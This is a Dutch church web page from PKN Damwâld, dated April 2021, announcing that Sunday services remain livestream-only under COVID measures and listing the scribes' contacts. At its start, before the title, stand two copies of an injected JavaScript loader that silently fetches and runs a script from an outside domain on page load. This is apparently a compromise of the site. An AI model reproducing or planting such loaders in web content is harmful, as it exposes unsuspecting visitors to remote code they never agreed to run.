;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Update coronamaatregelen - PKN Damwâld

Update coronamaatregelen

Gepubliceerd op: vrijdag 23 april 2021

Al is de lockdown iets versoepeld, wij als moderamen van de beide kerken hebben toch besloten dat de diensten fysiek nog niet door gemeenteleden kunnen worden bezocht. We blijven de adviezen van het RIVM volgen. De besmettingen lopen nog steeds op, ook helaas in onze directe omgeving. Zodra de situatie het toe laat, zullen we met de ochtenddiensten in de Ontmoeting starten met het fysiek bijwonen van gemeenteleden. De middagdiensten zullen vooralsnog niet worden gestart.

Met pijn in ieders hart hebben we deze beslissing genomen, wetend dat het voor een hele groep mensen zo belangrijk is om zondags samen te komen, ook al is het in een andere vorm dan we gewend waren. Gelukkig beschikken we over een livestream mogelijkheid en zijn de ochtenddiensten zo toch mee te beleven. Wat houdt dit nu concreet in: de ochtenddiensten worden per live stream uitgezonden, er zijn alleen de hoogst noodzakelijke mensen bij aanwezig (dominee, organist, koster, ambtsdragers en technici). U kunt zich hier dus niet voor opgeven. Er is geen Bernetsjerke en oppas.

Houdt u vooral de Klok en Us Tsjerkenijs in de gaten voor de laatste info. We wensen u allemaal Gods zegen toe in deze onrustige tijd, we mogen er zeker van zijn dat God voor Zijn Huis zorgt.

Als u vragen heeft: bel of mail gerust naar de scriba:
Geralda Teertstra
Tel: 0511-424766 of : Hervormdambv@hotmail.com
of
Jan Reitsma
Tel: 0511-421542 of: janrreitsma@gmail.com